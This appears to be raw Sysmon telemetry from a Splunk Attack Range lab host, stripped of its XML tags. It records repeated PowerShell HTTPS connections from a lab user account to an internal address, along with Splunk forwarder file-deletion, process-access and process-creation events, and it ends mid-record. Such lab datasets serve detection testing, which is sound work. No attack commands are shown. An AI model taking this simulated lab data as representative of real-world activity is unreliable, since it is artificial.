18:07:40.382{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56523-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083821Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:40.150{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56522-false10.0.1.12-8000- 23542300x800000000000000035083824Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:17.853{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB100C455BEB21EDCAC7B51B2A4020E6,SHA256=AD3A90908CB5BE0A24D307C36C7343A5DD859F966C76630452AF1C509F3E8DFA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083825Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:18.868{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD016AC0CF5136DC2B1D1EDC902E3127,SHA256=59891D239759B995F4EA34907C7ED0F8AA91E43766D3E34E5BEED1A04C1B0AF5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083826Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:19.900{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB84E13E569E086ED3FDEB11D96519F8,SHA256=FA86488C099A1A5E405E0CF57DC795473CE2937ED8D73A9BA1CB5F749D3681C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083827Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:20.934{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22C1C1F18E569E6BAA37722EDE9A55EF,SHA256=B847DF671968D7875057A1F75234EC3C7EF11F1DD063CD6A808B47DAEB6BB05A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083829Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:21.949{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE820950CE4EC4B7716BFCE1234DAF0C,SHA256=67E2AF647428EF8A8283D065E296B0E3A26392DF26D0264D0402DEC5891C290E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083828Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:21.399{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3524202FE07D2547A00468F46EFB4097,SHA256=6E52585144C4E76A174159347507174F38A2FD97666E7BE144191A9BA5515ECE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083832Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:22.997{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F41530F250325A57CE5191767DB76D6,SHA256=8257BAC737C4ABEF932F3BE36FBA5A99324C3B767B34B8E7B2210306EEA0AC75,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083831Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:46.395{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56525-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083830Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:46.111{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56524-false10.0.1.12-8000- 23542300x800000000000000035083833Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:24.016{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC0A8071F6E0BF3D0D169DE93917CCF3,SHA256=B62CF8BE2A298177BD740389CCBEF2072F7C3110D74536FEBE67975A84EFDE46,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083834Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:25.030{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=014E90A7B5CFFF1A4C26B28B986E0F76,SHA256=17662F05B9715D52354FA1F5B80611DE5C59970E71F5BDFE775CB150D01F6640,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083836Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:26.495{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3BE840C735D8DA520BE9A79F2FC425CB,SHA256=4F029C9E633D455357DFFC7200D5D1579D8C522DB3C9823726D31B41FF85A8CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083835Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:26.045{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B3E2779272886C46A42CDB68DCEF62B,SHA256=75745789BA5A7242F561CF7C63A0C601E2350368662FE98AF3ED363DCDFA2AEF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083841Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:51.406{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56527-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083840Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:51.205{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56526-false10.0.1.12-8000- 23542300x800000000000000035083839Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:27.245{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6060ED7C3298BD0A58EF4B3C3A44395A,SHA256=D547CBE51D956EAD01AFCF1B58BDFD172C73D6175A7E1EA22472CB6D5051D4BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083838Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:27.245{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC646C95D1B672937B1AC3B74E58366E,SHA256=32D40C296E072BBC6F7C8D971B2C64B5D98E3BAA0ABA4541148EC5CB09B4C23F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083837Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:27.076{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A3FF19C233F9F041C9B8F020F56F02B,SHA256=98261B557C3B3E1FD51821D67A2E05EBDC780558BBD476D19214A54E0D9DCB95,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083851Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:28.475{B81B27B7-4D60-613A-2290-03000000C801}65766444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083850Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:28.328{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D60-613A-2290-03000000C801}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083849Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:28.328{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083848Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:28.328{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083847Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:28.328{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083846Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:28.328{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083845Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:28.328{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4D60-613A-2290-03000000C801}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083844Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:28.328{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D60-613A-2290-03000000C801}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083843Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:28.313{B81B27B7-4D60-613A-2290-03000000C801}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083842Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:28.094{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37B1DB69BDD98FB189DFB8556CA4CE3D,SHA256=858E331FFFA0350939F35D10F59FA395ECEDD8449E267B4DFAA13F9E8670A13E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083861Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.411{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6060ED7C3298BD0A58EF4B3C3A44395A,SHA256=D547CBE51D956EAD01AFCF1B58BDFD172C73D6175A7E1EA22472CB6D5051D4BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083860Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.111{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9A65B8BC6F91288296A20B76E6D046B,SHA256=9D4B45C04B3A474BBC448ED8AEC28F589CF0F1232CBD2B32D6F7390D032ADCC5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083859Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.027{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D61-613A-2390-03000000C801}5608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083858Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.027{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083857Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.027{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083856Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.027{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083855Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.027{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083854Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.027{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4D61-613A-2390-03000000C801}5608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083853Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.027{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D61-613A-2390-03000000C801}5608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083852Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.012{B81B27B7-4D61-613A-2390-03000000C801}5608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 